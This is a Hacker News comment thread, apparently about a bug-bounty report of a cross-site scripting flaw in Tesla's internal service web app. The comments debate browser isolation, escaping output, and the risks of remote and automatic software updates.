The page being discussed is accessed by Tesla garages all over the country (and potentially internationally), creating a web app on an intranet site makes a lot of sense (for single point of update, single point of support, and the ability to run across diverse user devices). Particularly as the raw data always need to come from Tesla's HQ either way.

As to if the same garage machine should also have access to the internet, I cannot speak to that, it depends what else it is being used for (e.g. showing customers Tesla's public facing website for example, accessing third party vendor's inventory systems, research, etc).

No platform is immune from insecure usage. Not desktop software. Not terminal emulators. Not even mobile apps. That's particularly true when the context you're stealing information from is the same as the context you're attempting to run evil code.


I’m saying a network namespace or equivalent should isolate the browser from being able to access external IPs or non-whitelisted IPs, if the browser can also access internal systems.

A separate browser instance should be used for accessing external links, preferably with JIT disabled, with a file system namespace or equivalent disabling access to much of the file system.

But okay, nothing is secure according to you.


sanitize the output of the car name field so that any html tags are escaped.


That was an awesome summary and a good example of the value of bug bounty programs.


This is a great example of why it's terrible to have a car that can be remote controlled including the ability to push arbitrary updates. It should not be possible to use XSS to compromise a vehicle.


Following this logic, nothing should be remotely controlled because there might be security risks. Including OS updates to laptops.


Correct. No one should be able to push out arbitrary code without explicit user approval.


Users have a terrible habit of not running updates. Years of botnets suggest that automatic updates are probably the way to go.


In a perfect world, where all users are smart, sure.

But we're living in a world where there are still people running unpatched Windows XP boxes still vulnerable to MS08-067.

If it weren't for Windows automatically installing updates, I imagine at least half of home users would still be vulnerable to Eternal Blue.


sure but your laptop isn't gonna drive you straight into a wall, would he ?


XSS compromised a remote web app, not the vehicle. The vehicle hacked Tesla HQ, not vice versa


I share my birthday with a car. I'm unsure how to feel about this, probably better than sharing it with Rupert Murdoch, but worse than sharing it with Douglas Adams.


Nice to see Sam reached the front page of hacker news!




Consider applying for YC's Spring batch! Applications are open till Feb 11.

Guidelines | FAQ | Lists | API | Security | Legal | Apply to YC | Contact

Search: